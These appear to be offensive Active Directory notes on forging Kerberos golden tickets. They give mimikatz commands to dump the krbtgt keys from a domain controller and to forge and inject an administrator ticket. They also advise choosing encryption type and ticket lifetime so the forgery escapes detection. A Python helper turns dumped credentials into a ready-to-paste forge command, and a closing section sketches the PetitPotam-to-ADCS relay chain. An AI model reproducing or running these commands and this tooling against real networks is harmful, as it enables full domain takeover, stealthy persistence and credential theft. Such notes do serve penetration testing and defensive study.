Golden Tickets

  • assume the domain controller has been compromised
  • create a golden ticket

background

  • complete access to the whole domain: a TGT forged with the krbtgt key is accepted by every KDC in the domain, for any user name and group membership the forger chooses
  • tool: mimikatz, run on the compromised DC
  • lsadump::lsa /inject /name:krbtgt  (dumps the krbtgt account's keys from LSASS)
  • copy the domain SID (the S-1-5-21-... value on the "Domain :" line; not a user SID with a trailing RID)
  • copy the primary NTLM hash of krbtgt (or, better, its aes256_hmac key)
  • kerberos::golden /User:Administrator /Domain:marvel.local /sid:SID /krbtgt:HASH /id:500 /ptt
  • misc::cmd  (opens a cmd.exe that inherits the injected ticket)
  • that shell can now run psexec against every computer in the domain
  • silver ticket: the same forgery applied to a service ticket (TGS) instead of the TGT; it is signed with the target service account's key (e.g. a computer account's hash) rather than krbtgt's, grants access only to that service on that host, and never touches the DC
  • getting the golden ticket to another client: replace /ptt with /ticket:<file> so kerberos::golden writes a .kirbi file (default name ticket.kirbi), copy it over, and load it there with kerberos::ptt <file>

usage

# Extract the krbtgt account's keys (NTLM hash and AES keys) from LSASS on the DC:
mimikatz # lsadump::lsa /inject /name:krbtgt

# Forge a golden ticket and inject it straight into the current logon session (/ptt):
# /sid : the domain SID from the "Domain :" line of the lsadump output
# /rc4 : the krbtgt NTLM hash (8584c...) from lsadump; /krbtgt: is the same option
# /id  : RID 500 makes the PAC say "built-in Administrator" regardless of the /user name
# Caveat: on DCs with the PAC requestor checks from KB5008380 enforced, /user must be
# an existing account whose RID matches /id; a made-up name such as newAdmin is rejected.
mimikatz # kerberos::golden /domain:offense.local /sid:S-1-5-21-4172452648-1021989953-2368502130 /rc4:8584cfccd24f6a7f49ee56355d41bd30 /user:newAdmin /id:500 /ptt

# Check that the ticket is in the cache (a krbtgt/OFFENSE.LOCAL TGT for newAdmin should be listed):
klist

# Same forgery using the AES256 key and a lifetime that matches the default domain policy
# (/endin and /renewmax are in minutes: a 10-hour ticket renewable for 7 days) instead of
# mimikatz's ten-year default, so the ticket stands out neither by encryption type nor by lifetime:
PS> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /aes256:5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
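The two manual steps above (read the domain SID and krbtgt key out of lsadump output, paste them into kerberos::golden) are where copy errors happen, most often a user SID with a trailing RID pasted as /sid. The following helper is an added example for these notes, not part of mimikatz or of the original page: it parses lsadump::lsa /inject /name:krbtgt output, reduces the SID to the domain SID, refuses any account other than krbtgt, prefers the AES256 key over the NTLM hash, and composes the kerberos::golden line with the lifetime options used above. The sample output and every SID and key in it are constructed placeholders (the same values the notes use), and the lsadump layout is modelled on what mimikatz prints.

```python
import re

# Constructed sample of `lsadump::lsa /inject /name:krbtgt` output. The SID and key
# material are the placeholder values from the notes above (not real secrets); the
# layout mirrors what mimikatz prints.
SAMPLE_LSADUMP = """\
Domain : OFFENSE / S-1-5-21-4172452648-1021989953-2368502130

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 8584cfccd24f6a7f49ee56355d41bd30
    LM   :
  Hash NTLM: 8584cfccd24f6a7f49ee56355d41bd30

 * Kerberos-Newer-Keys
    Default Salt : OFFENSE.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
      aes128_hmac       (4096) : 0f1e2d3c4b5a69788796a5b4c3d2e1f0
      des_cbc_md5       (4096) : 0123456789abcdef
"""

_DOMAIN_RE = re.compile(r"^Domain\s*:\s*(\S+)\s*/\s*(S-1-5-21(?:-\d+){3,4})\s*$", re.M)
_USER_RE = re.compile(r"^User\s*:\s*(\S+)\s*$", re.M)
_NTLM_RE = re.compile(r"^\s*NTLM\s*:\s*([0-9a-fA-F]{32})\s*$", re.M)
_AES256_RE = re.compile(r"^\s*aes256_hmac\s*\(\d+\)\s*:\s*([0-9a-fA-F]{64})\s*$", re.M)


def domain_sid_from(sid: str) -> str:
    """Reduce a SID to the domain SID S-1-5-21-X-Y-Z (no trailing RID).

    kerberos::golden wants the *domain* SID; pasting a user SID such as
    S-1-5-21-X-Y-Z-500 yields a ticket for a domain that does not exist.
    """
    parts = sid.strip().split("-")
    if len(parts) < 7 or parts[:4] != ["S", "1", "5", "21"]:
        raise ValueError(f"not a domain-style SID: {sid!r}")
    return "-".join(parts[:7])


def parse_lsadump(text: str) -> dict:
    """Pull the fields kerberos::golden needs out of lsadump::lsa output."""
    domain = _DOMAIN_RE.search(text)
    user = _USER_RE.search(text)
    if not domain or not user:
        raise ValueError("no 'Domain :' / 'User :' lines found; is this lsadump::lsa output?")
    if user.group(1).lower() != "krbtgt":
        # A TGT must be signed with the KDC's own key; another account's key
        # gives at best a silver ticket for that account's service.
        raise ValueError(f"dumped account is {user.group(1)!r}, not krbtgt")
    ntlm = _NTLM_RE.search(text)      # "Hash NTLM:" lines do not match: they start with "Hash"
    aes = _AES256_RE.search(text)
    if not ntlm and not aes:
        raise ValueError("neither an NTLM hash nor an AES256 key was found")
    return {
        "netbios": domain.group(1),
        "domain_sid": domain_sid_from(domain.group(2)),
        "user": user.group(1),
        "ntlm": ntlm.group(1).lower() if ntlm else None,
        "aes256": aes.group(1).lower() if aes else None,
    }


def build_golden_command(keys: dict, dns_domain: str, user: str = "Administrator",
                         rid: int = 500, endin: int = 600, renewmax: int = 10080,
                         prefer_aes: bool = True) -> str:
    """Compose the kerberos::golden line.

    Defaults follow the usage section: built-in Administrator RID 500, a 10-hour
    ticket (/endin is minutes) renewable for 7 days, i.e. the default domain
    Kerberos policy rather than mimikatz's ten-year default. The AES256 key is
    preferred because RC4 tickets (encryption type 0x17) are a common detection
    heuristic in domains where AES is the norm.
    """
    if prefer_aes and keys.get("aes256"):
        key_arg = f"/aes256:{keys['aes256']}"
    elif keys.get("ntlm"):
        key_arg = f"/rc4:{keys['ntlm']}"   # /rc4 and /krbtgt are the same option
    else:
        raise ValueError("no usable krbtgt key")
    return (f"kerberos::golden /user:{user} /domain:{dns_domain} /sid:{keys['domain_sid']} "
            f"{key_arg} /id:{rid} /startoffset:0 /endin:{endin} /renewmax:{renewmax} /ptt")


if __name__ == "__main__":
    parsed = parse_lsadump(SAMPLE_LSADUMP)
    print(build_golden_command(parsed, "offense.local"))
```

Paste the printed line into mimikatz (or into BetterSafetyKatz as in the PowerShell example above) and verify with klist; pass prefer_aes=False to fall back to the NTLM hash on domains that still use RC4.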

ADCS + PetitPotam NTLM Relay = GoldenTicket

Why the chain ends in a golden ticket: PetitPotam (MS-EFSRPC) coerces the DC's machine account to authenticate to the attacker over NTLM; relaying that authentication to the ADCS web enrollment endpoint yields a certificate for the DC$ account; with that certificate the attacker authenticates via PKINIT as the DC, runs DCSync to pull the krbtgt hash, and forges the ticket as above.

Below are some of the conditions making an AD environment vulnerable to the ADCS + NTLM relay attack:

  • the CA's web enrollment endpoints accept NTLM authentication;
  • that NTLM authentication is not protected by EPA (Extended Protection for Authentication, which binds the NTLM exchange to the HTTPS channel); SMB signing, often listed alongside, does not protect the HTTP relay target;
  • ADCS is running either of these services:
    • Certificate Authority Web Enrollment (the /certsrv/ pages)
    • Certificate Enrollment Web Service (CES)

references